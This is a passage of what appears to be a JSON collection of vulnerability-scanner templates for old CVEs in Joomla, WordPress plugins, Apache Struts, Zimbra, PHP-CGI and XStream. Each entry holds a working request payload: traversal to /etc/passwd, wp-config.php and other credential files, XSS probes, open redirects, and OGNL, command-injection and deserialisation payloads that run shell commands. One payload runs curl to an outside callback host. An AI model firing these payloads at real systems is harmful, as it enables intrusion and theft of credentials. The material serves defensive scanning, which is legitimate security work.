Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Category Grid View Gallery ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Uploader","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Duplicator - WordPress Migration"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["traffic analy","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-3010","info":{"name":"Alcatel-Lucent OmniPCX - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"word","part":"body","words":["<TITLE>master</TITLE>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["2 Click Social Media Buttons","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-FaceThumb ==="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Wordpress Integrator"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["MF Gig Calendar ="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["All-in-One Event Calendar"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Monitor ="]}]},{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/yousaytoo-auto-publishing-plugin/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open 